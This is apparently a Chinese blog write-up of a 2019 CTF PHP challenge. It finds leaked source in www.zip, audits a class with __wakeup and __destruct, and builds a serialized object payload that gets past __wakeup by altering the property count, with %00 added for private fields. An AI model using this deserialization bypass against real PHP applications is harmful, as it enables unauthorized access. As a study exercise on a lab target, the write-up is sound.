[极客大挑战 2019]PHP
提示源码泄漏,来用扫描器扫一下
扫出来www.zip,然后下载下来
有五个文件,代码审计一下
这个地方有一个可以反序列化的点,找到类
逻辑很简单,username=admin password=100即可
但是有一个wakeup魔术方法会将我们的username=guest,改对象属性个数绕过即可
本地写个测试文件来找payload
<?php
class Name{
private $username = ‘nonono‘;
private $password = ‘yesyes‘;
public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = ‘guest‘; } function __destruct(){ if ($this->password != 100) { echo "</br>NO!!!hacker!!!</br>"; echo "You name is: "; echo $this->username;echo "</br>"; echo "You password is: "; echo $this->password;echo "</br>"; die(); } if ($this->username === ‘admin‘) { global $flag; echo $flag; }else{ echo "</br>hello my friend~~</br>sorry i can‘t give you the flag!"; die(); } }
}
$name = new Name(‘admin‘,‘100‘);
echo serialize($name);
// payload O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
然后注意是私有属性,别忘了加%00
几道php反序列化题目
标签:wak const private 提示 inf 挑战 echo cti ==
© 著作权归作者所有
发表评论